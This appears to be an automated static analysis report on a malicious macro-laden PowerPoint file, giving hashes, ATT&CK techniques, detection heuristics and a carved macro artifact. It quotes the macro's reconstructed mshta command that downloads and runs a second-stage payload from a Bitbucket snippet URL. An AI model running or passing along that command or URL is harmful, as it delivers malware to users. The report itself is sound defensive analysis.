Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 047d80cb755459b1…

MALICIOUS

Office (OLE) / .PPT

Size: 62.0 KB
Created: 2022-07-06 21:24:46
Authoring application: Microsoft Office PowerPoint
MD5: dcc68e3f0c6e78d291abc90ae5ca94f5
SHA-1: 3081a4c093328f07f0c00bd0839c24f083b4e936
SHA-256: 047d80cb755459b156e82321ecb1ae99e63169a38a313215e9b9a42f30ae6490
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.005 Client Execution: Mshta
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros that leverage the Auto_Close function to execute mshta.exe. This executable is then used to download and run a payload from the reconstructed URL: "mshta https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final". This indicates a likely initial access vector via spearphishing attachment, leading to the execution of a secondary stage. The use of mshta.exe is a common technique for bypassing application whitelisting and executing malicious code.

Heuristics (9)

  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • LOLBin reference in VBA (critical, OLE_VBA_LOLBIN)
  • Reference to mshta.exe (high, SC_STR_MSHTA)
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
  • GetObject call (high, OLE_VBA_GETOBJ)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND)
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URL strings (listed as carved; the variants differ only by truncation or a trailing character):
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final$
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplac
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256:  bcb7b3e1d12e1c13807945dc350e8ac3571f4675a1dfe60d1a798e02a35dc42a
Kind:     vba-macro
Source:   oletools.olevba.extract_macros (decoded VBA source)
Size:     1491 bytes